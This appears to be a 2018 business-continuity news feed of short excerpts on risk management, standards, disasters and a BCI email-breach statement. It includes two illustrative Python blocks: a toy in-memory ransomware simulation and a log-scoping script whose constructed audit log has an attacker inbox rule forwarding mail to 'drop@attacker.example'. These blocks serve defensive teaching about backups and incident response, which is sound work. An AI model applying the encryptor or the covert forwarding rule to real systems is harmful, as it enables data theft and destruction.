(TNS) — After rejecting the idea several years ago, Columbus, Ohio, now could have a gunshot detection system in place in three neighborhoods by the end of 2018.

Mayor Andrew J. Ginther announced on Monday that the city plans to roll out a yearlong pilot program with California-based ShotSpotter to install sensors in the Hilltop, Linden and the South Side neighborhoods.

Ginther announced that the city had decided to use ShotSpotter for the pilot during a news conference Monday to update the public on progress made on the Comprehensive Neighborhood Safety Strategy, a plan the city began last year to reduce violent crime.



Food is a passion of mine. I will eat pretty much anything – from cricket fried rice to a Bloody Mary topped with two Cornish hens, an avocado and fried okra to anything and everything with bacon. I love food! When I travel to industry conferences, I make it a point to hunt out at least one unique restaurant for one of my meals. My latest obsession – José Andrés restaurants. José Andrés is a James Beard award-winning chef with 29 restaurants. My current favorite restaurant of his is called Bazaar, where you can enjoy an amazing 18 course culinary experience. OMG it’s the absolute best, if you ever get a chance to try it…TRY IT!

So, what does all this amazing food talk have to do with business continuity or disaster recovery? Recently I found out it has a lot to do with disaster recovery. Let me explain… We always look immediately to the big organizations like FEMA and Red Cross to help support relief efforts. But, in reality, they can’t do it all. There is only so much food, supplies and volunteers to go around. That is why there are many other organizations (probably lesser known, but still very effective) that assist in supporting disaster relief. One of those organizations is called World Central Kitchen (WCK), to which the chef that I speak so highly of, José Andrés, is a major contributor.



Tuesday, 17 July 2018 05:29

What does food have to do with it…

Driving Change to Improve Resilience and Agility

Enterprise risk management (ERM) is a framework organizations use to manage risks and seize opportunities related to the achievement of their objectives. More and more frequently, upper-level management refuses to acknowledge ERM properly, which leads to missed opportunity and lost revenues. Read more to find out what world-renowned entrepreneur Peadar Duffy has to say about ERM and its business implications.

ERM is Dead!

I spent a couple of hours talking with the senior independent director of a major FTSE recently. He opined that in his experience, risk management consistently fails to deliver value. It is led by people who are more administrators than leaders, and more bureaucrats than doers. The SID in question has himself been a spectacularly successful CXO in a number of significant organizations.

Around the same time, another senior executive with impressive credentials remarked that in his experience, “risk has been done to him” by folk in risk management. He speaks of the parallel universes of the operational front lines, risk support and audit. Whereas the theory and rationale (three lines of defense) is sound, the method of execution is often suboptimal and sometimes even counterproductive.

I am sympathetic to these perspectives, as I think that whilst harsh, they are representative of generally held opinions of many in both front-line decision-making and strategic leadership positions.



Tuesday, 17 July 2018 05:29

ERM Is Dead! Long Live ERM!

In our hyper-connected, technology driven world, data breaches and cyber-attacks remain a significant threat to organizations, and a lack of awareness of the risks is often to blame. A newly revised standard will help.

Protecting the security of a company’s information – whether it be commercially sensitive or the personal details of their clients – has never been more under the spotlight. New legislation such as the European GDPR means organizations are under even greater pressure to ensure their information is secure. But having the most appropriate technologies and processes can be a minefield. The newly revised ISO/IEC 27005:2018, Information technology – Security techniques – Information security risk management, provides guidance for organizations on how to wade through it all by providing a framework for effectively managing the risks.

Complementary to ISO/IEC 27001:2013, which provides the requirements for an information security management system (ISMS), ISO/IEC 27005 has recently been updated to reflect the new version of ISO/IEC 27001 and thus ensure it is best equipped to meet the demands of organizations of today.



Why an Evolved Security Strategy is Critical

Jordan Mauriello, Chief Technology Officer of Critical Start, discusses how the operational model of legacy managed security service providers (MSSPs) can actually leave organizations more vulnerable to cyberattacks, increasing the risk of security breaches and potential compliance issues.

Today’s Security Landscape

Today, the number of cyberattacks is on the rise. According to a 2017 report from Accenture, there are more than 130 large-scale, targeted breaches in the U.S. per year, and the number is growing 27 percent annually. As a result, distributed enterprise IT environments are facing more complex threat landscapes. Threat actors and hackers are continually evolving their techniques and using new machine-generated attacks on a daily basis. With all this change, it can be extremely difficult for small enterprise security teams to keep up with the volume of alerts from their sprawling security infrastructure.



What Boards Should Know

As corporate scandals hit the headlines, boards of directors must often answer questions about their own engagement and oversight. Could they have known more sooner? With just a few attorneys directing search experts in an investigation of small collections of data, a preliminary micro-investigation can help provide directors with an answer to the question, “do we need to be worried about this?”

Every day, it seems like a new corporate scandal is splashed across the headlines, inevitably leading to questions (and often lawsuits) about who knew what, when. Forced to react, directors often must answer questions about their own engagement and oversight. Would greater board intervention earlier have been appropriate? This question often leads to discussion of the tools available to the board if it wants to test the quality and completeness of the information it may (or may not) be receiving from management.

Risk oversight is a hot button issue, and both investors and boards are paying attention. According to a 2017 survey by PwC, over 40 percent of directors polled responded that they would like their boards to spend additional time and resources on risk assessment and management.[1] Large institutional investors are also focused on risk oversight and risk related topics, with groups like Vanguard identifying risk oversight as one of four key pillars for effective corporate governance.

Yet the challenge for many boards is deciding if, when and how to scale up their oversight incrementally in response to rumors, suspicion or isolated reports that might not alone warrant a formal board or audit committee investigation with the attendant costs and disruptions.



How much should your organization spend on business continuity and IT disaster recovery? And how do you find out whether it is being spent in the right areas to really make the organization resilient? Mark Saville and Mark Smith explain how a technique borrowed from the way that high-hazard industries manage risks can help.

In May 2018, Airbnb was valued at $38bn (£28bn), significantly higher than the top rated hotel brand, Hilton Hotels, at $24bn (£18bn). The leverage of assets, mainly intangible ones, is having a major impact on how businesses are valued. The use of data, and ensuring its integrity, is the differentiating intangible asset in 2018.

The exploitation of data is a huge multiplier, and with cloud computing the barriers are falling, allowing easier access to what were once expensive IT resources. As a result, more companies can take advantage of IT and gain business insight from data.

If the use of data can create such value, how much should an organization spend to maintain the security, integrity and availability of its data and the supporting IT infrastructures?

In June 2018, the Business Continuity Institute published its fourth annual Cyber Resilience Report, which for the first time shows cyber attacks as the number one threat to business continuity. With the top three types of attack all aimed at compromising the integrity of data, this shift in threat means that investment in traditional high availability infrastructure no longer addresses the number one business continuity threat. High availability, through replication and clustering of systems, simply spreads the compromise: encrypted or corrupted data is propagated by the infrastructure itself. Public cloud services like Office 365 and Google Apps, which are primarily built for high availability, also don't protect client data against the foremost cyber attacks, as they share many of the characteristics of a replicated private cloud infrastructure.
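The following is an added illustration of the point above, not code from the article or from the BCI. A primary store replicates every write synchronously to a replica, the way a high availability cluster does, while a separate snapshot store keeps immutable point-in-time copies with a hash manifest. A toy XOR encryptor stands in for ransomware. All file names, contents, keys and the entropy threshold are constructed assumptions for the demonstration.

```python
"""Added example, not from the article: why replication is not a backup.
A primary store replicates every write synchronously to a replica (an HA
cluster). A separate snapshot store keeps immutable point-in-time copies with
a hash manifest. A toy encryptor stands in for ransomware. Everything here is
constructed in memory; file names, keys and thresholds are illustrative."""

import hashlib
import math
from collections import Counter
from typing import Dict, List, Optional


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def shannon_entropy(data: bytes) -> float:
    """Bits per byte. Documents and CSVs sit well below 7; ciphertext approaches 8."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


class ReplicatedStore:
    """High availability: every change on the primary is mirrored at once."""

    def __init__(self) -> None:
        self.primary: Dict[str, bytes] = {}
        self.replica: Dict[str, bytes] = {}

    def write(self, name: str, data: bytes) -> None:
        self.primary[name] = data
        self.replica[name] = data  # replication propagates good and bad writes alike

    def delete(self, name: str) -> None:
        self.primary.pop(name, None)
        self.replica.pop(name, None)  # deletions propagate too


class SnapshotStore:
    """Immutable point-in-time copies; nothing written later can alter them."""

    def __init__(self) -> None:
        self.snapshots: List[dict] = []

    def take(self, label: str, files: Dict[str, bytes]) -> None:
        self.snapshots.append({"label": label, "files": dict(files),
                               "manifest": {n: sha256(d) for n, d in files.items()}})

    def last_clean(self, entropy_threshold: float = 7.0) -> Optional[dict]:
        """Newest snapshot whose files still match the manifest and still look
        like plaintext (encrypted files have near-maximal byte entropy)."""
        for snap in reversed(self.snapshots):
            intact = all(sha256(d) == snap["manifest"][n] for n, d in snap["files"].items())
            plain = all(shannon_entropy(d) < entropy_threshold for d in snap["files"].values())
            if intact and plain:
                return snap
        return None


def toy_ransomware(store: ReplicatedStore, key: bytes) -> None:
    """Constructed stand-in for ransomware: XOR each file with a SHA-256
    keystream and rename it. Writes go through the store, so they replicate."""
    for name, data in list(store.primary.items()):
        stream = b"".join(hashlib.sha256(key + i.to_bytes(4, "big")).digest()
                          for i in range(len(data) // 32 + 1))
        store.write(name + ".locked", bytes(a ^ b for a, b in zip(data, stream)))
        store.delete(name)


def simulate() -> dict:
    docs = {  # constructed sample documents
        "ledger.csv": b"2018-07-01,ACME Ltd,invoice,1200.00\n" * 40,
        "recovery-plan.txt": b"Step 1: fail over. Step 2: restore data.\n" * 30,
    }
    cluster, snapshots = ReplicatedStore(), SnapshotStore()
    for name, data in docs.items():
        cluster.write(name, data)
    snapshots.take("nightly-1", cluster.primary)      # taken before the attack

    toy_ransomware(cluster, b"attacker-key")          # constructed attack
    snapshots.take("nightly-2", cluster.primary)      # the nightly job copies the damage

    clean = snapshots.last_clean()
    restored = clean["files"] if clean else {}
    return {
        "replica_mirrors_damage": cluster.replica == cluster.primary,
        "replica_has_clean_copy": any(n in cluster.replica for n in docs),
        "clean_snapshot": clean["label"] if clean else None,
        "restore_matches_original": all(restored.get(n) == d for n, d in docs.items()),
    }


if __name__ == "__main__":
    print(simulate())
```

The replica ends up byte-identical to the damaged primary and holds no clean copy; only the snapshot taken before the attack restores the originals, and the entropy plus manifest check is what lets the restore job skip the later snapshot that faithfully backed up the ciphertext.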



Consumer facing businesses are in the front line, but throughout organizational supply chains the pressure for product deliveries to be made as quickly as possible is increasing inexorably. Craig Summers looks at the issues.

There is a lot of talk in the market about driver shortages, shrinking timelines and increased regulation. As if this weren't enough, these challenges are compounded by a period of economic expansion and increased demand. And to top it off, we have customers pushing us for 'here' and 'now'.

The pressure is on: never before has an optimal transportation management system (TMS) strategy been so important.

Yesterday, a vague two-week delivery date was all the rage: that was the way it worked and we all accepted it.

Today, we want 24 hours, we demand a one-hour time slot and we expect it to show up without fail while being informed every step of the way; we are far more demanding than in yesteryear.

Tomorrow: just imagine what our demands will be!

That’s the customer perspective, the question is: Has your transportation strategy kept up with consumer expectations? Does your supply chain facilitate these delivery expectations? Are you able to get your inventory distributed efficiently between supplier and warehouse, warehouse and store, all nodes and the consumer?



(TNS) — For the military, including Rim of the Pacific exercise participants, there’s a whole lot of emergency, disaster response and mass casualty practice going on this week.

Three hundred volunteers will portray patients from an earthquake and tsunami who will be triaged in mobile hospital units on Ford Island and transported by helicopter, ambulance and ambulance bus to hospitals on six islands.

Twenty-seven Hawaii hospitals are participating, officials said.

“For the first time, all of the acute care hospitals in the state are participating in the RIMPAC (humanitarian assistance and disaster relief practice),” the Navy said in a release.



Some things are naturally tough to measure, but if you can figure out a way to do it that is meaningful and consistent, it can give you a real leg up in improving your performance in that area.

This is definitely the case with crisis management.

The things that matter most in effective crisis response can be tough to quantify, but there are ways of putting number values on those areas that can yield meaningful insights into your readiness.

Such metrics can help your organization identify the strengths, weaknesses, and opportunities of its crisis management posture. They can also help you in creating an optimally performing crisis management team, which is the key to helping you minimize the negative impacts of an emergency.

In today’s post, I am going to share with you the four metrics that I think every organization should gather and track if they want to be capable of responding effectively in a crisis. At the end, I’ll explain how you can leverage this data to improve your organization’s crisis management program.




Digital transformation is knocking at every company’s door. Cloud enabled ERP has the potential to create a tectonic shift in the way companies operate. There is finally an end in sight to multi-million-dollar ERP implementations that span years, and require armies of technical consultants to endure months of design, develop, test cycles.

A couple of big questions still vex IT leaders and managers:

  • Is my business ready for the cloud?
  • How do I select the right cloud ERP?

To answer the first question, companies should conduct a detailed digital readiness assessment to evaluate if business leaders, process owners, and IT groups are ready to take advantage of digital capabilities in the market place.

The rest of this blog will focus on how to select the right cloud ERP.



Reimagining Risk

A recent Deloitte poll surveyed nearly 2,400 professionals in a bid to better understand third-party or extended enterprise risk management (EERM) programs and explore how enhanced management of these programs can drive value for an organization. Deloitte’s Dan Kinsella explains why executives should reimagine EERM for value creation.

The benefits related to expanding a company’s capabilities beyond the traditional four walls of an organization are too big to ignore, but many executives see challenges in managing the third-party risk involved. Unfortunately, these challenges can obscure the perceived value in expanding the enterprise and test the resolve of decision-makers who want to make it happen.

That’s the thrust of the poll, which surveyed professionals across a range of industries, including banking and securities, technology, investment management, travel, hospitality and services, insurance and other sectors. A mere 3.9 percent of respondents in the survey defined their EERM efforts as “optimized.”

That means only a small fraction of organizations have matured EERM to the point of having integrated strategy and decision-making, continuous improvement and investment, executive champions, and highly customized decision support tools fed with external data. In constructing our poll, we positioned these as some of the key attributes necessary to mature EERM programs and create value. Organizations that develop these attributes can manage their third parties more efficiently and with greater confidence. So why do so few companies have them in place?


(TNS) — FORT LAUDERDALE, Fla. — When 911 callers reported gunfire at Marjory Stoneman Douglas High School in Parkland on Feb. 14, operators in Coral Springs relayed their information to a regional dispatch center, a process that might have caused fatal delays in the law enforcement response.

The two-step reporting system resulted from Coral Springs’ decision to remain outside a 2013 consolidation of 911 service in Broward County. Parkland relies on Coral Springs for 911 services and the Sheriff’s Office for law enforcement.

“What happened in Parkland was that every single cellular 911 call made from Marjory Stoneman Douglas High School, every kid in that school, everybody in Parkland that was calling 911 to report information, was that it was going to the Coral Springs communications center,” said Pinellas County Sheriff Bob Gualtieri, chairman of the Marjory Stoneman Douglas High School Public Safety Commission.



Resolverite Spotlight: Michael Perrotte

Thursday, 12 July 2018 14:29

The Resolverite Spotlight is a new series that highlights the inner workings of our workplace through the best people to tell our story: our Resolverites!

This week, Resolver's Talent Specialist Victoria Pearson sat down with Michael Perrotte, a Developer based in our Toronto office, to learn more about what he does.



(TNS) — Every second counts during an emergency, especially when it comes to an emergency in a school.

That's why Laura Gasparis Vonfrolio, a former College of Staten Island (CSI) professor of nursing, came up with an idea to help teachers during a crisis.

The Teacher Alert System (TAS) is a wireless remote that provides direct connection to the police, firefighters, EMTs and the principal. It also includes a button to alert the school and police if there is an active shooter.

"As a college professor and registered nurse I became frustrated with the lack of resources available to our teachers," Vonfrolio said. "Why can't teachers who have the responsibility of teaching and caring for our most precious possessions — our children — have a better way to summon help?"

The wireless unit connects to the base using Bluetooth, which connects to Wi-Fi, cellular or satellite.



People in business continuity talk a lot about black swans: unexpected events that come from outside normal experience and have strongly negative effects.

Black swan events are definitely worth thinking about and being prepared for due to their potentially catastrophic impacts.

However, in today’s post, we are going to talk about the opposite of black swan events. Some people refer to such events as white swans, but I am going to refer to them as “7 Bad Things That Are Likely to Happen This Week.”

These are negative events that I think actually have a high likelihood of happening to some organization somewhere in the coming week—or at any rate, they are things that happen fairly frequently, having a negative impact each time.

If one of these common business continuity threats happens to your organization, will you be ready?



(TNS) - Recovering from Hurricane Harvey doesn’t just mean rebuilding a home or finding a new job. Long after one’s physical recovery is complete, the signs of stress and trauma may remain.

Texans Recovering Together provides free, confidential crisis counseling and referral services to help survivors work through their disaster recovery, according to a news release Monday.

The program is run by the Texas Health and Human Services Commission and funded through grants from the Federal Emergency Management Agency totaling $13.9 million.

Crisis counseling providers work through home visits and community settings for Texans Recovering Together rather than conducting sessions in an office. Counselors and survivors can dial 211 to be referred to local providers.



When discussing solid state drives (SSDs), many people — even experts — use the terms "flash" and "SSD" interchangeably. It's an understandable linguistic choice because the two technologies are very closely related. However, the two terms don't refer to exactly the same thing.

The difference between the two might be easiest to understand with an analogy. And one of the most apt analogies that gets used in the storage industry is that flash is like eggs and an SSD is like an omelet. In the same way that an omelet is made mostly of eggs, an SSD is made mostly of flash. And if someone asked what you had for breakfast, it would be understandable if you answered "eggs," even if what you really had was an omelet.

Continuing the analogy, you can also do lots of things with eggs besides making omelets. In the same way, you can do lots of things with flash besides making SSDs.



(TNS) — As a ferocious hurricane bears down on South Florida, water managers desperately lower canals in anticipation of 4 feet of rain.

Everyone east of Dixie Highway is ordered evacuated, for fear of a menacing storm surge. Forecasters debate whether the storm will generate the 200 mph winds to achieve Category 6 status.

That is one scenario for hurricanes in a warmer world, a subject of fiendish complexity and considerable scientific research.

Some changes — such as the slowing of hurricanes’ forward motion and the worsening of storm surges from rising sea levels — are happening now. Other effects, such as their increase in strength, may have already begun but are difficult to detect, considering all of the other climate forces at work.



Early in the morning of 5th July 2018 the BCI became aware that we had become the subject of a targeted cyber-attack.

An attacker compromised account credentials and ultimately gained access to a single BCI email account. On discovering unauthorized access to the email account, we initiated our standard incident response process. We engaged outside specialists to assure ourselves, clients, and other stakeholders that the review was thorough and objective. The BCI took a variety of actions:

  • Immediately executed steps to stop and contain the attack.
  • Ascertained the size and scope of the attack. The team reviewed logs from the incident to understand what the attacker did in the email platform, and it used this information to guide its response to the attack.
  • Determined what the attacker targeted. The attacker targeted an email platform. This system is distinct and separate from other BCI platforms, including those that host client data, collaborative work among BCI professionals, engagement systems and other non-cloud based email systems. None of these were impacted. We know from the forensic review conducted by our own cyber professionals that the attacker was specifically focused on obtaining details of one particular client.
  • Reviewed materials targeted by the hacker. This incident involved unstructured data; namely, email. Through a detailed review of logs, the BCI was able to determine what the attacker actually did and that the number of email messages targeted by the attacker was a small fraction of those stored. We looked at all of the targeted email messages in a manual document-by-document review process, with careful assessment of the nature of the information contained in each email. By conducting this eyes-on review, we were able to determine the very few instances where there may have been active credentials, personal information, or other sensitive information that had an impact on clients.
  • Contacted impacted clients. The BCI contacted the single client impacted.
  • Alerted authorities. The BCI began contacting governmental authorities immediately.

The team determined that:

  • The attacker is no longer in the BCI’s system. The BCI has seen no signs of any subsequent activities. We have taken a number of important steps to remove the attacker’s access to our environment, including the blocking of IP addresses, disabling accounts, resetting passwords, and implementing enhanced monitoring.
  • No disruption occurred to client businesses, to the BCI's ability to serve clients, or to consumers.

The BCI remains deeply committed to ensuring that its cyber-security defences provide a high standard of protection, to investing heavily in protecting confidential information and to continually reviewing and enhancing cyber security.
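The scoping steps in the BCI statement above (review the platform logs, establish what the attacker did, count the messages touched, then block addresses and reset accounts) can be run as code against a mailbox audit export. The example below is added here and is not BCI's code or data: the log lines are constructed to resemble a cloud e-mail platform's JSON audit export, and the field names, user, IP addresses, message IDs and mailbox size are all illustrative assumptions. The baseline of known source addresses is built from successful logins before the suspected incident window; any successful login from an address outside that baseline is treated as the attacker, and every event from those addresses is attributed to the intrusion.

```python
"""Added example (not part of the BCI statement): scoping a single
compromised mailbox from its audit log. Log lines, field names, user, IPs,
message IDs and MAILBOX_SIZE are constructed assumptions."""

import json

AUDIT_LOG = """
{"ts": "2018-07-01T08:02:11Z", "user": "analyst@example.org", "op": "UserLoggedIn", "ip": "203.0.113.10", "result": "Success"}
{"ts": "2018-07-02T09:15:40Z", "user": "analyst@example.org", "op": "UserLoggedIn", "ip": "203.0.113.10", "result": "Success"}
{"ts": "2018-07-03T17:44:02Z", "user": "analyst@example.org", "op": "UserLoggedIn", "ip": "203.0.113.10", "result": "Success"}
{"ts": "2018-07-04T23:58:19Z", "user": "analyst@example.org", "op": "UserLoggedIn", "ip": "198.51.100.77", "result": "Failed"}
{"ts": "2018-07-04T23:58:31Z", "user": "analyst@example.org", "op": "UserLoggedIn", "ip": "198.51.100.77", "result": "Success"}
{"ts": "2018-07-05T00:01:05Z", "user": "analyst@example.org", "op": "MailItemsAccessed", "ip": "198.51.100.77", "items": ["m-1041", "m-1042", "m-1107"], "folder": "Inbox"}
{"ts": "2018-07-05T00:03:50Z", "user": "analyst@example.org", "op": "SearchMailbox", "ip": "198.51.100.77", "query": "ClientCo contract"}
{"ts": "2018-07-05T00:04:12Z", "user": "analyst@example.org", "op": "MailItemsAccessed", "ip": "198.51.100.77", "items": ["m-0933", "m-0934"], "folder": "Sent Items"}
{"ts": "2018-07-05T00:06:40Z", "user": "analyst@example.org", "op": "New-InboxRule", "ip": "198.51.100.77", "rule": {"name": ".", "forward_to": "drop@attacker.example"}}
{"ts": "2018-07-05T08:10:00Z", "user": "analyst@example.org", "op": "UserLoggedIn", "ip": "203.0.113.10", "result": "Success"}
{"ts": "2018-07-05T08:12:30Z", "user": "analyst@example.org", "op": "MailItemsAccessed", "ip": "203.0.113.10", "items": ["m-1108"], "folder": "Inbox"}
"""

MAILBOX_SIZE = 1200  # constructed: total messages stored in the mailbox


def parse_events(text: str) -> list:
    """One JSON object per line; blank lines are ignored."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def baseline_ips(events: list, before: str) -> set:
    """Addresses with a successful login before the suspected incident window.
    ISO-8601 UTC timestamps compare correctly as plain strings."""
    return {e["ip"] for e in events
            if e["op"] == "UserLoggedIn" and e["result"] == "Success" and e["ts"] < before}


def scope_incident(events: list, before: str, mailbox_size: int) -> dict:
    """Attribute activity to the attacker and derive scope plus containment."""
    known = baseline_ips(events, before)
    attacker_ips = {e["ip"] for e in events
                    if e["op"] == "UserLoggedIn" and e["result"] == "Success"
                    and e["ts"] >= before and e["ip"] not in known}
    hostile = [e for e in events if e["ip"] in attacker_ips]

    accessed, searches, rules = set(), [], []
    for e in hostile:
        if e["op"] == "MailItemsAccessed":
            accessed.update(e["items"])           # what was actually read
        elif e["op"] == "SearchMailbox":
            searches.append(e["query"])           # what the attacker was after
        elif e["op"] == "New-InboxRule" and e["rule"].get("forward_to"):
            rules.append(e["rule"])               # persistence: silent forwarding
    accounts = sorted({e["user"] for e in hostile})

    return {
        "attacker_ips": attacker_ips,
        "first_attacker_activity": min(e["ts"] for e in hostile) if hostile else None,
        "messages_accessed": sorted(accessed),
        "fraction_of_mailbox": len(accessed) / mailbox_size,
        "searches": searches,
        "forwarding_rules": rules,
        "containment": [f"block {ip}" for ip in sorted(attacker_ips)]
                       + [f"disable and reset {u}" for u in accounts]
                       + [f"remove rule {r['name']!r} -> {r['forward_to']}" for r in rules],
    }


if __name__ == "__main__":
    report = scope_incident(parse_events(AUDIT_LOG), before="2018-07-04",
                            mailbox_size=MAILBOX_SIZE)
    print(json.dumps(report, indent=2, default=sorted))
```

Two details matter in practice: the failed login from the new address is kept in the attacker timeline because it marks the start of the credential attack, and the legitimate user's own read of m-1108 after the intrusion is not counted because it came from a baseline address. The forwarding rule is the item most often missed when a response stops at a password reset, which is why it appears in the containment list alongside the address blocks and the account reset.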

Changing public health messaging to focus on the impact of actions rather than the outcomes of actions could have significant implications for how we deal with pandemic threats, according to a new study from City University of London, the Oxford Martin School (University of Oxford), and Yale University.

Uncertainty about how our choices will affect others is a common occurrence in our social lives, with previous research suggesting that such uncertainty leads to solely selfish decisions and actions. However, the new study found for the first time that uncertain situations do not always lead to selfish behaviour. Appealing to people to think about the impact of such potentially harmful actions can lead to decisions which err on the side of caution. The paper is published in Nature Human Behaviour.

When it comes to social decisions, the uncertainty we face can be split into two types, known as outcome uncertainty (i.e. uncertainty about the outcomes of decisions) and impact uncertainty (i.e. how an outcome will impact another person).



How The GDPR Will Impact E-Signatures

Tuesday, 10 July 2018 15:13

4 Key Criteria to Consider When Evaluating Solutions

The EU General Data Protection Regulation is now officially in effect. If your organization transacts with individuals and businesses on a global scale and is looking to implement e-signatures, ensure the solutions on your shortlist are able to demonstrate full compliance with the GDPR requirements. Here are four key criteria to consider.

The European Union's (EU) new landmark privacy law, the General Data Protection Regulation (GDPR) [Regulation (EU) 2016/679], is now officially in effect. The GDPR expands the privacy rights of EU individuals and places new obligations on organizations that market to, track or handle the personal data of people in the EU. The rise of technologies such as the cloud and social media has changed the privacy landscape for good, and the EU's updated data privacy standard takes into account the implications of these new technologies for personal data. The good news is that unlike its predecessor, the Data Protection Directive 95/46/EC, which introduced administrative burdens and a fragmented legal framework, the GDPR is a single law that applies uniformly across the EU as of May 25, 2018.

All companies that process and hold the personal data of individuals residing in the EU must comply with the GDPR, regardless of company location. This includes e-signature providers that help organizations around the world automate and digitize their manual, paper-based processes. E-signature solutions manage and process documents that may include personal data, so it is important that they ensure adequate privacy protection and give individuals the means to exercise their right of access to their personal data. If your organization transacts with individuals and businesses on a global scale and is looking to implement e-signatures, ensure the solutions on your shortlist are able to demonstrate full compliance with the GDPR requirements.



One of the biggest challenges businesses face today is making informed decisions on how to transform their IT organizations from legacy data centers into the required hybrid IT infrastructures of tomorrow.

To help them, the newest Gartner Magic Quadrant (MQ) assessed 20 IT vendors in the market, positioning them based on completeness of vision and ability to execute.

The Data Center Outsourcing/Hybrid Infrastructure Managed Services (DCO/HIMS) Magic Quadrants for North America and Europe, issued June 18, evaluate service providers’ ability to deliver data center managed services (DCMSs). This includes DCO, HIMS, private cloud managed services, mainframe managed services, ERP hosting managed services, data center transformation, cloud migration services, edge DCMSs, remote infrastructure management and IUS (Infrastructure Utility Services).

This year, Sungard Availability Services (Sungard AS) is positioned as a Challenger in North America.



(TNS) - The morning of Sept. 12, Nick and Bonita Colbert hiked up Flagler Estates Boulevard, through thigh-high waters and carrying an empty cooler between them with their sandals stacked on top.

"It will take days for this to go down," said Hal Baughman as he surveyed the flooding.

Baughman, a friend of the Colberts, had driven down to the edge of the water to give them a lift out to a local convenience store so they could grab more supplies.

As the couple made it to dry ground, they stopped to talk a little about what they experienced riding out Hurricane Irma on a family member's property.



And What You Can Do About It


With Audi’s CEO arrested for fraud, it’s time to shine the spotlight on corporate governance. Inexperienced leaders, confusion over the role of governance and a lack of commitment means that time and time again, we see the same mistakes made by companies across all industries. This article shares three mistakes companies make when managing corporate governance and how to overcome them.   

According to the Global Governance, Risk and Compliance Trends Report 2018, more leadership teams are engaging with governance, risk and compliance than ever. The survey of more than 200 GRC professionals found that 53 percent said leadership is engaged, an increase of 15 percent in the past year.

Why is good corporate governance so critical for a successful business? For a start, businesses with highly advanced corporate governance spend considerably less on fixing mistakes, but they are also able to adapt faster, and they have a much better rate of employee retention.

Here are three reasons your business is failing at corporate governance and what you can do about it.



The populations of most world cities are growing fast, and with it come challenges and opportunities for keeping citizens safe and well. New International Standards for measuring and improving the performance of cities have just been published to help cities keep on top of the game.

Already, more than half of the world's population lives in a city, and that number is expected to grow to nearly 70 % by 2050. Keeping up with rising urbanization and the stress it places on resources and infrastructure poses a serious challenge for cities everywhere, creating the need for effective planning, management and evidence-based policy making.

In order to make such decisions, cities need a reliable reference for measuring their performance, which is where the world’s first International Standard for city indicators comes into play.

ISO 37120, Indicators for city services and quality of life in communities, first published in 2014, was the first set of internationally standardized city indicators, providing a uniform approach to what is measured and how. For the first time, cities were able to communicate amongst themselves using globally standardized, comparable data, allowing them to get insights into other cities and learn from each other like never before.

Now, the standard has just been updated, offering even more indicators to help cities effectively improve the quality of life of their citizens and plan for a more sustainable future.



Wildfires are destructive for obvious reasons and for some that aren’t as obvious: They can and do contaminate water supplies.

A recent report, co-authored by Fernando Rosario-Ortiz, associate professor at the University of Colorado’s Department of Civil, Environmental and Architectural Engineering, sheds some light on what is becoming acknowledged as a serious issue with more intense and numerous wildfires.

Many drinking water utilities get their water from forested watersheds, where wildfires are increasing and posing threats to the water supply.

Wildfires that trigger mudslides and mobilize sediment are a common and widely acknowledged hazard because of the imagery of homes and roads being destroyed. Less visible, and therefore perhaps less acknowledged, is water supply contamination.



Wildfire season is here and businesses have a lot at stake. The far-reaching impact of wildfires on business is astounding, but there are proactive steps a company can take.

The Devastation of Wildfires

In the hot, dry summer months, people have more to worry about than a sunburn. Wildfires can break out at any moment, putting homes and businesses at risk. Whether from a lightning strike, a fallen electrical pole, a cigarette, or a campfire; a single spark can quickly turn into a massive wildfire that can cause irreparable damage.

According to NOAA, in 2017 the U.S. experienced 66,131 fires, the seventh most wildfires on record. The impacts of these fires were catastrophic, burning 9,781,062 acres of land, the third-most ever recorded, or roughly 148 acres per fire.

Fighting these fires consumes massive amounts of resources. Reuters reported that the 2017 U.S. wildfire season cost more than $2 billion in suppression efforts alone, and that figure does not include the total cost of the 2017 California wildfires, which topped $180 billion. The fires caused widespread damage, destroying land, buildings, homes, transportation routes, wildlife, and agriculture, not to mention killing and injuring many people.



Given the title of this blog, you might wonder why a consultant whose focus is technology recovery would advise you not to rely on technology to keep your business running during a crisis. The reason is, our business technology is similar to the cars we drive: Most of the time, they work well and provide great convenience, but every now and then they get a flat tire or break down. Most of us have backup plans to deal with this eventuality, such as membership in an auto club that provides roadside rescue. In the same way, we need workarounds to help us keep things going when our business technology goes down.

At MHA, one question we routinely ask when conducting a business impact analysis (BIA) is whether the client has devised manual workarounds for whatever application or automated process we are looking at. In other words, could the operation continue if the technology were to go down? Very often the answer is “no.” There are no workarounds, and if the technology went down the operation would grind to a halt.



When you’re completing a jigsaw puzzle, it is a lot easier to grasp how the pieces fit together if you have a picture of the completed puzzle to go by.

By the same token, it would be easier for an organization to implement a program to manage operational risk if it had access to an overview of just what such a program would look like.

In today’s post, I am going to provide just such an overview, in the form of a high-level description of the Operational Risk Management (ORM) lifecycle.

I hope this nudges your organization toward considering implementing a program to manage operational risk, if you do not have one already.

Before we begin, here are a few basics about operational risk, in case the topic is new to you or you need to refresh your memory.



Management systems help organizations achieve their objectives, and auditing them makes good business sense. The International Standard for auditing management systems has just been updated, giving more guidance than ever before. 

Management system standards are growing in popularity as organizations see how they can be applied to manage interrelated processes to achieve their objectives. From quality or energy management to food or traffic safety, the list of standards aimed at helping organizations put in place effective management systems is getting long.

ISO alone has over 70 management system standards, building on international expertise and best practice to help organizations perform better, save money and develop a competitive edge.

In order to get the best out of a management system and ensure continuous improvement, regular auditing needs to take place. Not an easy task if, like most organizations, you have several management systems in place.



This series is dedicated to providing direction for applying Project Management principles to starting a Business Continuity or Disaster Recovery (BC/DR) Program.  This is the first installment of a multi-part series.  In this installment we will focus on the Project Initiation phase.  Subsequent segments will be aimed at additional phases of starting a BC/DR Program, on improving an existing BC/DR Program, and on elevating a mature program to a new level of efficiency and effectiveness.

Starting a Business Continuity Program

Launching a BC/DR Program requires its own plan.  This is not a plan as in a recovery or response plan, but a plan in the sense of a project plan.  Starting a BC/DR Program is no different from starting any other project, and success essentially hinges on your project management skills.  You may want to reach out to the Project Management Office (PMO) if you are fortunate enough to be part of an organization that has one.  The PMO may be able to provide an experienced project manager who can assist by applying current project management theory and techniques to the initiative.  If your organization does not have a PMO, or a resource is not available, then gaining a basic understanding of project management is the starting point.

There are many available information sources for project management principles.  The Project Management Institute (PMI) http://www.pmi.org/ is the leading authority in the field.  The PMI offers training and certification and most community colleges and universities offer courses in project management.



